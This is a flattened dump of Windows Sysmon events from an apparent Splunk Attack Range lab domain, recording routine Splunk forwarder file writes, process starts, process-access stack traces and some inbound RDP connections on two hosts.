Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=159ADEFEDC0C5AFED798C9696AFEA364,SHA256=981EC7FE78B97489206DE74ED59CCEE587E893020AA5AA236AB5EBC29E171998,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979260Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:50.755{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61746-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979259Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:48.872{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59408-false10.0.1.12-8000- 23542300x80000000000000001050597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.974{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE6B11F54F43D88A9C7BB550963A7DF1,SHA256=4274C1B1BD47FB0C157FA21E471C8051D62D03E82D3BB5FA790B522F001964CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.974{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4ACC7A6E3344891D8C5CB550FB462AF4,SHA256=11B9E9FAF0A589A5170A37CD308BEF1B177897A96092B4E5D47FD0C9D6BA7BEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.974{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFF428C7401ADE9CC76B861EECA01C63,SHA256=B93D61812DE05F154CC7E8E0B1B39A3697F4A0880775412873D21C7DF2D471CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979262Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:54.121{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE89BE3961A8188245DBAB597999B5E8,SHA256=9D78EDE3EE7601D4E80A87EF904DF04DC54B91BCDCA6CE2632843A11DD925AF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.850{5EBD8912-8B52-6151-447A-00000000FC01}67927072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.672{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B52-6151-447A-00000000FC01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.670{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.670{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.669{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.669{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.669{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B52-6151-447A-00000000FC01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.669{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B52-6151-447A-00000000FC01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.651{5EBD8912-8B52-6151-447A-00000000FC01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.172{5EBD8912-8B51-6151-437A-00000000FC01}20922108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979263Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:55.168{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E87974089C7B3864D141414DEF82CDA,SHA256=BEA99806AEA2041D969785FBCF95B02EF70CEDD4A869125453CAB3567B495A4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.522{5EBD8912-8B53-6151-457A-00000000FC01}43764280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.353{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B53-6151-457A-00000000FC01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.353{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.353{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.353{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.353{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B53-6151-457A-00000000FC01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.353{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.353{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B53-6151-457A-00000000FC01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.338{5EBD8912-8B53-6151-457A-00000000FC01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979264Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:56.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2643F896E3D87D07C3BE4757CD0E14F1,SHA256=145938A76BB17158CFE4A57BB8D4CD76029203EF5646D91BAEF54B7D8898F74B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:54.877{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60304-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.341{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4ACC7A6E3344891D8C5CB550FB462AF4,SHA256=11B9E9FAF0A589A5170A37CD308BEF1B177897A96092B4E5D47FD0C9D6BA7BEB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.053{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B54-6151-467A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.053{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.053{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.053{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 